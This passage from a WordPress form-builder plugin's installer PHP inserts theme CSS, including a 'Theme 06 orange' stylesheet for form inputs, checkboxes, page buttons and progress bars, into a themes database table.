16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0176AA ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #0176AA;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #008AFF;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #0073D3 ;\r\n	background: -moz-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0073D3 ), color-stop(39%, #008FE1 ), color-stop(100%, #00A7ED ));\r\n	background: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -o-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\nbackground: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #0176AA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 06 orange\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #FAB17A;\r\nmargin-bottom: 10px;\r\ncolor: #FAB17A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FFA15C;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #C78655;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FAB17A;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #FFA15C;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #C78655;\r\n}\r\n.button-submit:hover {\r\n	background: #FAB17A;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #FFA15C ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #FFA15C ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #C78655;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #FF8A34;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #FF8932 ;\r\n	background: -moz-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3BA28 ), color-stop(39%, #FFD325 ), color-stop(100%, #FEB824 ));\r\n	background: -o-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -ms-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -webkit-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: 